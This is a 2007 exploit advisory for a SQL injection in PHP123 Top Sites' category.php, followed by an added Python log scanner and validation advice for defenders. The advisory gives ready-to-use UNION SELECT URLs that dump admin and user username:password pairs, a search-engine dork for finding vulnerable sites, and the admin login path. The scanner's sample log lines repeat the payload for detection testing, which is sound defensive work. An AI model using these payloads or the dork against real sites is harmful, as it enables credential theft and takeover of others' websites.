php123-sql.txt

2007-07-31T00:00:00
ID PACKETSTORM:58149
Type packetstorm
Reporter t0pp8uzz
Modified 2007-07-31T00:00:00

Description

                                        
                                            `--==+================================================================================+==--  
--==+ PHP123 Top Sites SQL Injection Vulnerability +==--  
--==+================================================================================+==--  
  
  
  
AUTHOR: t0pP8uZz & xprog  
SITE: N/A  
DORK: allintext:"Browse our directory of our members top sites or create your own for free!"  
  
  
DESCRIPTION:   
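SQL injection through the cat parameter of category.php lets a remote user pull admin/user login credentials (username and password) out of the admin and users tables.  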
  
  
EXPLOITS:  
http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/admin/*  
http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/users/*  
  
  
NOTE/TIP:   
admin login is at /siteadmin/  
AltaVista also returns a few different results; don't use the allintext: operator there, though.  
  
  
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.org !  
  
  
--==+================================================================================+==--  
--==+ PHP123 Top Sites SQL Injection Vulnerability +==--  
--==+================================================================================+==--  
  
`
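
For defenders checking web server logs for requests of the shape shown under EXPLOITS, the following is an added example, not part of the original advisory or of PHP123. It assumes combined-format access logs and that legitimate cat values are non-negative integer category ids; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_TOKENS = re.compile(r"\b(?:union|select|concat|from)\b")
SQL_COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)  # /**/ used as whitespace, trailing /*

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [31/Jul/2007:10:00:01 +0000] "GET /category.php?cat=7 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [31/Jul/2007:10:00:07 +0000] "GET /category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/admin/* HTTP/1.1" 200 812',
    '203.0.113.9 - - [31/Jul/2007:10:00:09 +0000] "GET /category.php?cat=-1%252F**%252Funion%252F**%252Fselect%252F**%252F1 HTTP/1.1" 200 640',
    '203.0.113.7 - - [31/Jul/2007:10:01:30 +0000] "GET /index.php?cat=union HTTP/1.1" 200 2048',
]

def normalize(value):
    """Decode nested URL encoding (bounded), turn SQL comments into spaces, lowercase."""
    for _ in range(3):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return " ".join(SQL_COMMENT.sub(" ", value).split()).lower()

def check_request(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/category.php"):
        return []
    findings = []
    for raw in parse_qs(parts.query, keep_blank_values=True).get("cat", []):
        value = normalize(raw)
        # Assumption: legitimate cat values are non-negative integer category ids.
        if not re.fullmatch(r"[0-9]+", value):
            findings.append("cat is not a non-negative integer")
        if len(set(SQL_TOKENS.findall(value))) >= 2:
            findings.append("SQL keywords in cat")
    return findings

def scan(lines):
    """Map 1-based line number -> findings for every flagged log line."""
    flagged = {}
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        findings = check_request(match.group(1)) if match else []
        if findings:
            flagged[number] = findings
    return flagged

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG).items():
        print(number, "; ".join(findings))
```

The integer check alone is the stronger signal, since it does not depend on a keyword list; the same rule applied server-side (rejecting any cat value that is not an integer before it reaches the query) closes the injection point.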